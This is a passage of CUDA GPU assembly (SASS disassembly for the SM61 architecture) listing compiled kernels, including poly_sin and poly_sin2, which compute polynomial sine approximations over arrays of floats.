/*00d8*/ { ISCADD R14.CC, R14, c[0x0][0x140], 0x2 ; /* 0x4c18810005070e0e */
/* 0x001f9000fe2001b1 */
/*00e8*/ LDG.E R4, [R10] }
/* 0xeed4200000070a04 */
/*00f0*/ SHR.U32 R7, R18, 0x1e ; /* 0x3828000001e71207 */
/*00f8*/ IADD32I R16, R3, 0x4 ; /* 0x1c00000000470310 */
/* 0x000ac400fe0007f2 */
/*0108*/ IADD.X R15, R6, c[0x0][0x144] ; /* 0x4c1008000517060f */
/*0110*/ { ISCADD R18.CC, R18, c[0x0][0x140], 0x2 ; /* 0x4c18810005071212 */
/*0118*/ LDG.E R6, [R14] }
/* 0xeed4200000070e06 */
/* 0x001fc800fe820ff1 */
/*0128*/ SHR.U32 R8, R16.reuse, 0x1e ; /* 0x3828000001e71008 */
/*0130*/ IADD32I R12, R3, 0x5 ; /* 0x1c0000000057030c */
/*0138*/ IADD.X R19, R7, c[0x0][0x144] ; /* 0x4c10080005170713 */
/* 0x005f8400162007f0 */
/*0148*/ { ISCADD R16.CC, R16, c[0x0][0x140], 0x2 ; /* 0x4c18810005071010 */
/*0150*/ LDG.E R7, [R18] }
/* 0xeed4200000071207 */
/*0158*/ SHR.U32 R10, R12, 0x1e ; /* 0x3828000001e70c0a */
/* 0x001fc000fe4207f4 */
/*0168*/ IADD32I R9, R3.reuse, 0x6 ; /* 0x1c00000000670309 */
/*0170*/ IADD.X R17, R8, c[0x0][0x144] ; /* 0x4c10080005170811 */
/*0178*/ { ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/* 0x001fc840fea001b1 */
/*0188*/ LDG.E R8, [R16] }
/* 0xeed4200000071008 */
/*0190*/ SHR.U32 R20, R9.reuse, 0x1e ; /* 0x3828000001e70914 */
/*0198*/ IADD.X R13, R10, c[0x0][0x144] ; /* 0x4c10080005170a0d */
/* 0x001f9400562027f0 */
/*01a8*/ { ISCADD R14.CC, R9, c[0x0][0x140], 0x2 ; /* 0x4c1881000507090e */
/*01b0*/ LDG.E R9, [R12] }
/* 0xeed4200000070c09 */
/*01b8*/ IADD32I R10, R3, 0x7 ; /* 0x1c0000000077030a */
/* 0x003fc040fe2007f1 */
/*01c8*/ IADD.X R15, R20, c[0x0][0x144] ; /* 0x4c1008000517140f */
/*01d0*/ SHR.U32 R11, R10.reuse, 0x1e ; /* 0x3828000001e70a0b */
/*01d8*/ { ISCADD R18.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a12 */
/* 0x001ec400fe4000b6 */
/*01e8*/ LDG.E R10, [R14] }
/* 0xeed4200000070e0a */
/*01f0*/ IADD.X R19, R11, c[0x0][0x144] ; /* 0x4c10080005170b13 */
/*01f8*/ LDG.E R11, [R18] ; /* 0xeed420000007120b */
/* 0x001fb000fe2007e6 */
/*0208*/ IADD32I R21, R21, 0x8 ; /* 0x1c00000000871515 */
/*0210*/ ISETP.NE.AND P0, PT, R21, RZ, PT ; /* 0x5b6b03800ff71507 */
/*0218*/ IADD32I R3, R3, 0x8 ; /* 0x1c00000000870303 */
/* 0x085fd440fe2007f3 */
/*0228*/ DEPBAR.LE SB5, 0x6 ; /* 0xf0f0000034670000 */
/*0230*/ FMUL32I R20, R5.reuse, -0.00018269040447194129229 ; /* 0x1e0b93f909570514 */
/*0238*/ FMUL R16, R5.reuse, R5 ; /* 0x5c68000000570510 */
/* 0x001fc400fca007f1 */
/*0248*/ FFMA R17, R5, R20, c[0x2][0x0] ; /* 0x51800a0800070511 */
/*0250*/ FMUL32I R23, R4, -0.00018269040447194129229 ; /* 0x1e0b93f909570417 */
/*0258*/ FFMA R22, R16, R17, c[0x2][0x4] ; /* 0x5180088800171016 */
/* 0x009fc400fe6007f0 */
/*0268*/ { FMUL R16, R5, R16 ; /* 0x5c68000001070510 */
/*0270*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*0278*/ FMUL32I R12, R6, -0.00018269040447194129229 ; /* 0x1e0b93f90957060c */
/* 0x001f8400fe2207f1 */
/*0288*/ FMUL R13, R4.reuse, R4 ; /* 0x5c6800000047040d */
/*0290*/ FFMA R23, R4, R23, c[0x2][0x0] ; /* 0x51800b8800070417 */
/*0298*/ FFMA R22, R16, R22, R5 ; /* 0x5980028001671016 */
/* 0x003fc400fe2207f2 */
/*02a8*/ FMUL R5, R6.reuse, R6 ; /* 0x5c68000000670605 */
/*02b0*/ FFMA R12, R6, R12, c[0x2][0x0] ; /* 0x518006080007060c */
/*02b8*/ FMUL32I R14, R7, -0.00018269040447194129229 ; /* 0x1e0b93f90957070e */
/* 0x001f8800fe2007f1 */
/*02c8*/ FFMA R23, R13, R23, c[0x2][0x4] ; /* 0x51800b8800170d17 */
/*02d0*/ FMUL R13, R4, R13 ; /* 0x5c68000000d7040d */
/*02d8*/ FADD R22, R22, R0 ; /* 0x5c58000000071616 */
/* 0x001fc440fe2007f1 */
/*02e8*/ FFMA R12, R5, R12, c[0x2][0x4] ; /* 0x518006080017050c */
/*02f0*/ FMUL R0, R7.reuse, R7 ; /* 0x5c68000000770700 */
/*02f8*/ FFMA R14, R7, R14, c[0x2][0x0] ; /* 0x518007080007070e */
/* 0x001fc400fe6007f0 */
/*0308*/ { FMUL R5, R6, R5 ; /* 0x5c68000000570605 */
/*0310*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0318*/ FMUL32I R15, R8, -0.00018269040447194129229 ; /* 0x1e0b93f90957080f */
/* 0x001fc400fe2007e1 */
/*0328*/ FFMA R13, R13, R23, R4 ; /* 0x5980020001770d0d */
/*0330*/ FFMA R14, R0, R14, c[0x2][0x4] ; /* 0x518007080017000e */
/*0338*/ FFMA R12, R5, R12, R6 ; /* 0x5980030000c7050c */
/* 0x001fc440fe2007f1 */
/*0348*/ FMUL R0, R7, R0 ; /* 0x5c68000000070700 */
/*0350*/ FMUL R5, R8.reuse, R8 ; /* 0x5c68000000870805 */
/*0358*/ FFMA R15, R8, R15, c[0x2][0x0] ; /* 0x518007880007080f */
/* 0x001fc400fe4007e1 */
/*0368*/ FMUL32I R4, R9, -0.00018269040447194129229 ; /* 0x1e0b93f909570904 */
/*0370*/ FADD R13, R22, R13 ; /* 0x5c58000000d7160d */
/*0378*/ FFMA R14, R0, R14, R7 ; /* 0x5980038000e7000e */
/* 0x001fc400fe2207f1 */
/*0388*/ FMUL R0, R9.reuse, R9 ; /* 0x5c68000000970900 */
/*0390*/ FFMA R15, R5, R15, c[0x2][0x4] ; /* 0x518007880017050f */
/*0398*/ FFMA R6, R9, R4, c[0x2][0x0] ; /* 0x5180020800070906 */
/* 0x001fc460fe2007e1 */
/*03a8*/ FMUL R5, R8, R5 ; /* 0x5c68000000570805 */
/*03b0*/ FMUL32I R7, R10.reuse, -0.00018269040447194129229 ; /* 0x1e0b93f909570a07 */
/*03b8*/ FADD R12, R13, R12 ; /* 0x5c58000000c70d0c */
/* 0x001fc400fe2007f2 */
/*03c8*/ FMUL R4, R10, R10 ; /* 0x5c68000000a70a04 */
/*03d0*/ FFMA R6, R0, R6, c[0x2][0x4] ; /* 0x5180030800170006 */
/*03d8*/ FFMA R5, R5, R15, R8 ; /* 0x5980040000f70505 */
/* 0x081fc400fe2007e1 */
/*03e8*/ FMUL R0, R9, R0 ; /* 0x5c68000000070900 */
/*03f0*/ FFMA R7, R10, R7, c[0x2][0x0] ; /* 0x5180038800070a07 */
/*03f8*/ FMUL32I R8, R11.reuse, -0.00018269040447194129229 ; /* 0x1e0b93f909570b08 */
/* 0x081fc400fe2007f3 */
/*0408*/ FADD R12, R12, R14 ; /* 0x5c58000000e70c0c */
/*0410*/ FFMA R0, R0, R6, R9 ; /* 0x5980048000670000 */
/*0418*/ FMUL R6, R11.reuse, R11 ; /* 0x5c68000000b70b06 */
/* 0x001fc400fe2007e1 */
/*0428*/ FFMA R8, R11, R8, c[0x2][0x0] ; /* 0x5180040800070b08 */
/*0430*/ FFMA R7, R4, R7, c[0x2][0x4] ; /* 0x5180038800170407 */
/*0438*/ FADD R5, R12, R5 ; /* 0x5c58000000570c05 */
/* 0x001fc400fe2007f3 */
/*0448*/ FMUL R4, R10, R4 ; /* 0x5c68000000470a04 */
/*0450*/ FFMA R8, R6, R8, c[0x2][0x4] ; /* 0x5180040800170608 */
/*0458*/ FMUL R6, R11, R6 ; /* 0x5c68000000670b06 */
/* 0x001fc800fe8007e1 */
/*0468*/ FADD R0, R5, R0 ; /* 0x5c58000000070500 */
/*0470*/ FFMA R7, R4, R7, R10 ; /* 0x5980050000770407 */
/*0478*/ FFMA R6, R6, R8, R11 ; /* 0x5980058000870606 */
/* 0x001ff400fe0007fd */
/*0488*/ FADD R0, R0, R7 ; /* 0x5c58000000770000 */
/*0490*/ { FADD R0, R0, R6 ; /* 0x5c58000000670000 */
/*0498*/ @P0 BRA 0x60 }
/* 0xe2400fffbc00000f */
/* 0x001f8800fcc207f1 */
/*04a8*/ SHR R3, R2.reuse, 0x1e ; /* 0x3829000001e70203 */
/*04b0*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*04b8*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/* 0x001ffc00ffe007f5 */
/*04c8*/ STG.E [R2], R0 ; /* 0xeedc200000070200 */
/*04d0*/ EXIT ; /* 0xe30000000007000f */
/*04d8*/ BRA 0x4d8 ; /* 0xe2400fffff87000f */
/* 0x001f8000fc0007e0 */
/*04e8*/ NOP; /* 0x50b0000000070f00 */
/*04f0*/ NOP; /* 0x50b0000000070f00 */
/*04f8*/ NOP; /* 0x50b0000000070f00 */
................................
Function : _Z9poly_sin2PKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R10, RZ ; /* 0x5c9807800ff7000a */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x083fc400e7e007f0 */
/*0028*/ { MOV32I R22, 0xffffff00 ; /* 0x010ffffff007f016 */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/* 0x001fd800fec217f6 */
/*0048*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/*0050*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0058*/ MOV R12, R0 ; /* 0x5c9807800007000c */
/* 0x001f8801fcc207f1 */
/*0068*/ SHR.U32 R2, R12.reuse, 0x1e ; /* 0x3828000001e70c02 */
/*0070*/ ISCADD R4.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c04 */
/*0078*/ IADD.X R5, R2, c[0x0][0x144] ; /* 0x4c10080005170205 */
/* 0x081fc400fec000b1 */
/*0088*/ LDG.E R4, [R4] ; /* 0xeed4200000070404 */
/*0090*/ IADD32I R2, R12, 0x1 ; /* 0x1c00000000170c02 */
/*0098*/ SHR.U32 R3, R2.reuse, 0x1e ; /* 0x3828000001e70203 */
/* 0x0046c400fc4007e6 */
/*00a8*/ ISCADD R2.CC, R2, c[0x0][0x140], 0x2 ; /* 0x4c18810005070202 */
/*00b0*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*00b8*/ LDG.E R19, [R2] ; /* 0xeed4200000070213 */
/* 0x001f9840fe2007f6 */
/*00c8*/ IADD32I R6, R12, 0x2 ; /* 0x1c00000000270c06 */
/*00d0*/ SHR.U32 R7, R6.reuse, 0x1e ; /* 0x3828000001e70607 */
/*00d8*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/* 0x001fd800562007e2 */
/*00e8*/ IADD.X R7, R7, c[0x0][0x144] ; /* 0x4c10080005170707 */
/*00f0*/ LDG.E R18, [R6] ; /* 0xeed4200000070612 */
/*00f8*/ IADD32I R8, R12, 0x3 ; /* 0x1c00000000370c08 */
/* 0x001f8800fcc20ff1 */
/*0108*/ SHR.U32 R5, R8.reuse, 0x1e ; /* 0x3828000001e70805 */
/*0110*/ ISCADD R8.CC, R8, c[0x0][0x140], 0x2 ; /* 0x4c18810005070808 */
/*0118*/ IADD.X R9, R5, c[0x0][0x144] ; /* 0x4c10080005170509 */
/* 0x085fc400fec007b1 */
/*0128*/ LDG.E R17, [R8] ; /* 0xeed4200000070811 */
/*0130*/ IADD32I R5, R12, 0x4 ; /* 0x1c00000000470c05 */
/*0138*/ SHR.U32 R3, R5.reuse, 0x1e ; /* 0x3828000001e70503 */
/* 0x0002c400fc4007e6 */
/*0148*/ ISCADD R2.CC, R5, c[0x0][0x140], 0x2 ; /* 0x4c18810005070502 */
/*0150*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0158*/ LDG.E R16, [R2] ; /* 0xeed4200000070210 */
/* 0x001f9840fe2027f6 */
/*0168*/ IADD32I R6, R12, 0x5 ; /* 0x1c00000000570c06 */
/*0170*/ SHR.U32 R5, R6.reuse, 0x1e ; /* 0x3828000001e70605 */
/*0178*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/* 0x001fd800362007e2 */
/*0188*/ IADD.X R7, R5, c[0x0][0x144] ; /* 0x4c10080005170507 */
/*0190*/ LDG.E R15, [R6] ; /* 0xeed420000007060f */
/*0198*/ IADD32I R24, R12, 0x6 ; /* 0x1c00000000670c18 */
/* 0x001f8800fcc207f1 */
/*01a8*/ SHR.U32 R5, R24.reuse, 0x1e ; /* 0x3828000001e71805 */
/*01b0*/ ISCADD R24.CC, R24, c[0x0][0x140], 0x2 ; /* 0x4c18810005071818 */
/*01b8*/ IADD.X R25, R5, c[0x0][0x144] ; /* 0x4c10080005170519 */
/* 0x083fc400fec002b1 */
/*01c8*/ LDG.E R14, [R24] ; /* 0xeed420000007180e */
/*01d0*/ IADD32I R26, R12, 0x7 ; /* 0x1c00000000770c1a */
/*01d8*/ SHR.U32 R2, R26.reuse, 0x1e ; /* 0x3828000001e71a02 */
/* 0x001ec400fc4007e6 */
/*01e8*/ ISCADD R26.CC, R26, c[0x0][0x140], 0x2 ; /* 0x4c18810005071a1a */
/*01f0*/ IADD.X R27, R2, c[0x0][0x144] ; /* 0x4c1008000517021b */
/*01f8*/ LDG.E R13, [R26] ; /* 0xeed4200000071a0d */
/* 0x101cc400fe600714 */
/*0208*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*0210*/ DEPBAR.LE SB5, 0x7 ; /* 0xf0f0000034770000 */
/*0218*/ F2F.F64.F32 R8, R4.reuse ; /* 0x5ca8000000470b08 */
/* 0x100e4402e42007f7 */
/*0228*/ FMUL R5, R4, R4 ; /* 0x5c68000000470405 */
/*0230*/ DMUL R6, R8, c[0x2][0x0] ; /* 0x4c80000800070806 */
/*0238*/ F2F.F64.F32 R2, R5.reuse ; /* 0x5ca8000000570b02 */
/* 0x011cdc02f22007f6 */
/*0248*/ FMUL R4, R4, R5 ; /* 0x5c68000000570404 */
/*0250*/ DFMA R20, R8, R6, c[0x2][0x8] ; /* 0x5370030800270814 */
/*0258*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x011d8400fe608330 */
/*0268*/ { DFMA R6, R2, R20, c[0x2][0x10] ; /* 0x53700a0800470206 */
/*0270*/ DEPBAR.LE SB5, 0x6 }
/* 0xf0f0000034670000 */
/*0278*/ F2F.F64.F32 R2, R19 ; /* 0x5ca8000001370b02 */
/* 0x091d4402226027f4 */
/*0288*/ FMUL R24, R19, R19 ; /* 0x5c68000001371318 */
/*0290*/ DFMA R8, R4, R6, R8 ; /* 0x5b70040000670408 */
/*0298*/ DMUL R20, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070214 */
/* 0x008888010e601734 */
/*02a8*/ F2F.F64.F32 R4, R24 ; /* 0x5ca8000001870b04 */
/*02b0*/ DADD R10, R8, R10 ; /* 0x5c70000000a7080a */
/*02b8*/ DFMA R6, R2, R20, c[0x2][0x8] ; /* 0x53700a0800270206 */
/* 0x003c4400fe6027f0 */
/*02c8*/ { FMUL R20, R19, R24 ; /* 0x5c68000001871314 */
/*02d0*/ DEPBAR.LE SB5, 0x5 }
/* 0xf0f0000034570000 */
/*02d8*/ F2F.F64.F32 R8, R18 ; /* 0x5ca8000001270b08 */
/* 0x001cd00206204752 */
/*02e8*/ F2F.F32.F64 R10, R10 ; /* 0x5ca8000000a70e0a */
/*02f0*/ DFMA R4, R4, R6, c[0x2][0x10] ; /* 0x5370030800470404 */
/*02f8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/* 0x009d4840fe200f01 */
/*0308*/ DMUL R6, R8, c[0x2][0x0] ; /* 0x4c80000800070806 */
/*0310*/ FMUL R19, R18.reuse, R18 ; /* 0x5c68000001271213 */
/*0318*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/* 0x0020c882e6201153 */
/*0328*/ DFMA R4, R20, R4, R2 ; /* 0x5b70010000471404 */
/*0330*/ F2F.F64.F32 R2, R19.reuse ; /* 0x5ca8000001370b02 */
/*0338*/ DFMA R20, R8, R6, c[0x2][0x8] ; /* 0x5370030800270814 */
/* 0x00454404e2800fe2 */
/*0348*/ FMUL R6, R18, R19 ; /* 0x5c68000001371206 */
/*0350*/ DADD R4, R4, R10 ; /* 0x5c70000000a70404 */
/*0358*/ DFMA R20, R2, R20, c[0x2][0x10] ; /* 0x53700a0800470214 */
/* 0x105cc400fe600750 */
/*0368*/ { F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/*0370*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*0378*/ F2F.F64.F32 R2, R17.reuse ; /* 0x5ca8000001170b02 */
/* 0x00854c00fc600f11 */
/*0388*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/*0390*/ FMUL R18, R17, R17 ; /* 0x5c68000001171112 */
/*0398*/ DFMA R8, R6, R20, R8 ; /* 0x5b70040001470608 */
/* 0x001c5801ea221731 */
/*03a8*/ DMUL R20, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070214 */
/*03b0*/ F2F.F64.F32 R10, R4 ; /* 0x5ca8000000470b0a */
/*03b8*/ F2F.F64.F32 R6, R18 ; /* 0x5ca8000001270b06 */
/* 0x005fc00428401711 */
/*03c8*/ DFMA R20, R2, R20, c[0x2][0x8] ; /* 0x53700a0800270214 */
/*03d0*/ DADD R8, R8, R10 ; /* 0x5c70000000a70808 */
/*03d8*/ { FMUL R10, R17, R18 ; /* 0x5c6800000127110a */
/* 0x00244400e64007f3 */
/*03e8*/ DEPBAR.LE SB5, 0x3 }
/* 0xf0f0000034370000 */
/*03f0*/ F2F.F64.F32 R4, R16 ; /* 0x5ca8000001070b04 */
/*03f8*/ DFMA R20, R6, R20, c[0x2][0x10] ; /* 0x53700a0800470614 */
/* 0x005c8404ea800711 */
/*0408*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*0410*/ F2F.F32.F64 R8, R8 ; /* 0x5ca8000000870e08 */
/*0418*/ DMUL R6, R4, c[0x2][0x0] ; /* 0x4c80000800070406 */
/* 0x00844801424207f2 */
/*0428*/ FMUL R17, R16.reuse, R16 ; /* 0x5c68000001071011 */
/*0430*/ DFMA R20, R10, R20, R2 ; /* 0x5b70010001470a14 */
/*0438*/ F2F.F64.F32 R10, R8 ; /* 0x5ca8000000870b0a */
/* 0x005f8c022a440751 */
/*0448*/ F2F.F64.F32 R2, R17.reuse ; /* 0x5ca8000001170b02 */
/*0450*/ DFMA R8, R4, R6, c[0x2][0x8] ; /* 0x5370030800270408 */
/*0458*/ FMUL R6, R16, R17 ; /* 0x5c68000001171006 */
/* 0x001d40042a200f13 */
/*0468*/ DADD R10, R20, R10 ; /* 0x5c70000000a7140a */
/*0470*/ DFMA R8, R2, R8, c[0x2][0x10] ; /* 0x5370040800470208 */
/*0478*/ { F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/* 0x003c5002e62007f3 */
/*0488*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0490*/ F2F.F64.F32 R2, R15 ; /* 0x5ca8000000f70b02 */
/*0498*/ F2F.F32.F64 R10, R10 ; /* 0x5ca8000000a70e0a */
/* 0x081fc442e6202143 */
/*04a8*/ DFMA R8, R6, R8, R4 ; /* 0x5b70020000870608 */
/*04b0*/ DMUL R4, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070204 */
/*04b8*/ FMUL R18, R15.reuse, R15 ; /* 0x5c68000000f70f12 */
/* 0x00444480e2200f55 */
/*04c8*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*04d0*/ F2F.F64.F32 R6, R18.reuse ; /* 0x5ca8000001270b06 */
/*04d8*/ DFMA R16, R2, R4, c[0x2][0x8] ; /* 0x5370020800270210 */
/* 0x001fcc04ea0007e1 */
/*04e8*/ FMUL R15, R15, R18 ; /* 0x5c68000001270f0f */
/*04f0*/ { DADD R8, R8, R10 ; /* 0x5c70000000a70808 */
/*04f8*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/* 0x0021c4010e401733 */
/*0508*/ F2F.F64.F32 R4, R14 ; /* 0x5ca8000000e70b04 */
/*0510*/ DFMA R6, R6, R16, c[0x2][0x10] ; /* 0x5370080800470606 */
/*0518*/ F2F.F64.F32 R16, R15 ; /* 0x5ca8000000f70b10 */
/* 0x083fd002e4202752 */
/*0528*/ F2F.F32.F64 R8, R8 ; /* 0x5ca8000000870e08 */
/*0530*/ DMUL R10, R4, c[0x2][0x0] ; /* 0x4c8000080007040a */
/*0538*/ FMUL R15, R14.reuse, R14 ; /* 0x5c68000000e70e0f */
/* 0x103c4404ee204071 */
/*0548*/ DFMA R6, R16, R6, R2 ; /* 0x5b70010000671006 */
/*0550*/ F2F.F64.F32 R8, R8 ; /* 0x5ca8000000870b08 */
/*0558*/ F2F.F64.F32 R2, R15.reuse ; /* 0x5ca8000000f70b02 */
/* 0x011cc802fc801112 */
/*0568*/ DFMA R16, R4, R10, c[0x2][0x8] ; /* 0x5370050800270410 */
/*0570*/ FMUL R10, R14, R15 ; /* 0x5c68000000f70e0a */
/*0578*/ DADD R6, R6, R8 ; /* 0x5c70000000870606 */
/* 0x043c5000ea200851 */
/*0588*/ DFMA R16, R2, R16, c[0x2][0x10] ; /* 0x5370080800470210 */
/*0590*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*0598*/ F2F.F64.F32 R2, R13 ; /* 0x5ca8000000d70b02 */
/* 0x083c440428201733 */
/*05a8*/ F2F.F32.F64 R6, R6 ; /* 0x5ca8000000670e06 */
/*05b0*/ DFMA R10, R10, R16, R4 ; /* 0x5b70020001070a0a */
/*05b8*/ DMUL R8, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070208 */
/* 0x105cc4022a6207f3 */
/*05c8*/ FMUL R14, R13.reuse, R13 ; /* 0x5c68000000d70d0e */
/*05d0*/ F2F.F64.F32 R4, R6 ; /* 0x5ca8000000670b04 */
/*05d8*/ F2F.F64.F32 R6, R14.reuse ; /* 0x5ca8000000e70b06 */
/* 0x009c5001fc400832 */
/*05e8*/ DFMA R16, R2, R8, c[0x2][0x8] ; /* 0x5370040800270210 */
/*05f0*/ FMUL R8, R13, R14 ; /* 0x5c68000000e70d08 */
/*05f8*/ DADD R4, R10, R4 ; /* 0x5c70000000470a04 */
/* 0x003c4402ea600751 */
/*0608*/ F2F.F64.F32 R8, R8 ; /* 0x5ca8000000870b08 */
/*0610*/ DFMA R6, R6, R16, c[0x2][0x10] ; /* 0x5370080800470606 */
/*0618*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/* 0x003cc404e46007f4 */
/*0628*/ IADD32I R22, R22, 0x8 ; /* 0x1c00000000871616 */
/*0630*/ DFMA R6, R8, R6, R2 ; /* 0x5b70010000670806 */
/*0638*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x001fdc02e22007f7 */
/*0648*/ ISETP.NE.AND P0, PT, R22, RZ, PT ; /* 0x5b6b03800ff71607 */
/*0650*/ DADD R4, R6, R4 ; /* 0x5c70000000470604 */
/*0658*/ IADD32I R12, R12, 0x8 ; /* 0x1c00000000870c0c */
/* 0x081fc400ffc00830 */
/*0668*/ { F2F.F32.F64 R10, R4 ; /* 0x5ca8000000470e0a */
/*0670*/ @P0 BRA 0x60 }
/* 0xe2400fff9e80000f */
/*0678*/ SHR R2, R0.reuse, 0x1e ; /* 0x3829000001e70002 */
/* 0x005fd400fc400fe6 */
/*0688*/ ISCADD R4.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470004 */
/*0690*/ IADD.X R5, R2, c[0x0][0x154] ; /* 0x4c10080005570205 */
/*0698*/ STG.E [R4], R10 ; /* 0xeedc20000007040a */
/* 0x001f8000ffe007ff */
/*06a8*/ EXIT ; /* 0xe30000000007000f */
/*06b0*/ BRA 0x6b0 ; /* 0xe2400fffff87000f */
/*06b8*/ NOP; /* 0x50b0000000070f00 */
................................
Function : _Z8poly_sinPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R13, RZ ; /* 0x5c9807800ff7000d */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x083fc400e7e007f0 */
/*0028*/ { MOV32I R22, 0xffffff00 ; /* 0x010ffffff007f016 */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/* 0x001fd800fec217f6 */
/*0048*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/*0050*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0058*/ MOV R12, R0 ; /* 0x5c9807800007000c */
/* 0x001f8800fcc20ff1 */
/*0068*/ SHR.U32 R3, R12.reuse, 0x1e ; /* 0x3828000001e70c03 */
/*0070*/ ISCADD R2.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c02 */
/*0078*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/* 0x081fc400fec000b1 */
/*0088*/ LDG.E R2, [R2] ; /* 0xeed4200000070202 */
/*0090*/ IADD32I R10, R12, 0x1 ; /* 0x1c00000000170c0a */
/*0098*/ SHR.U32 R4, R10.reuse, 0x1e ; /* 0x3828000001e70a04 */
/* 0x0046c400fc4007e6 */
/*00a8*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/*00b0*/ IADD.X R11, R4, c[0x0][0x144] ; /* 0x4c1008000517040b */
/*00b8*/ LDG.E R14, [R10] ; /* 0xeed4200000070a0e */
/* 0x001f9840fe2007f6 */
/*00c8*/ IADD32I R4, R12, 0x2 ; /* 0x1c00000000270c04 */
/*00d0*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*00d8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001fd800f62007e2 */
/*00e8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*00f0*/ LDG.E R4, [R4] ; /* 0xeed4200000070404 */
/*00f8*/ IADD32I R6, R12, 0x3 ; /* 0x1c00000000370c06 */
/* 0x001f8800fcc20ff1 */
/*0108*/ SHR.U32 R3, R6.reuse, 0x1e ; /* 0x3828000001e70603 */
/*0110*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/*0118*/ IADD.X R7, R3, c[0x0][0x144] ; /* 0x4c10080005170307 */
/* 0x001fd800e22007b1 */
/*0128*/ LDG.E R6, [R6] ; /* 0xeed4200000070606 */
/*0130*/ F2F.F64.F32 R26, R13 ; /* 0x5ca8000000d70b1a */
/*0138*/ IADD32I R22, R22, 0x4 ; /* 0x1c00000000471616 */
/* 0x001fcc00fd8007e1 */
/*0148*/ ISETP.NE.AND P0, PT, R22, RZ, PT ; /* 0x5b6b03800ff71607 */
/*0150*/ IADD32I R12, R12, 0x4 ; /* 0x1c00000000470c0c */
/*0158*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x009cf804ebc0075e */
/*0168*/ F2F.F64.F32 R8, R2 ; /* 0x5ca8000000270b08 */
/*0170*/ DMUL R2, R8, c[0x2][0x0] ; /* 0x4c80000800070802 */
/*0178*/ DMUL R2, R8, R2 ; /* 0x5c80000000270802 */
/* 0x0045c800fe621150 */
/*0188*/ { DMUL R10, R8.reuse, R2 ; /* 0x5c8000000027080a */
/*0190*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0198*/ F2F.F64.F32 R2, R14 ; /* 0x5ca8000000e70b02 */
/* 0x011d8804ea621733 */
/*01a8*/ DMUL R14, R8.reuse, c[0x2][0x8] ; /* 0x4c8000080027080e */
/*01b0*/ DMUL R10, R8, R10 ; /* 0x5c80000000a7080a */
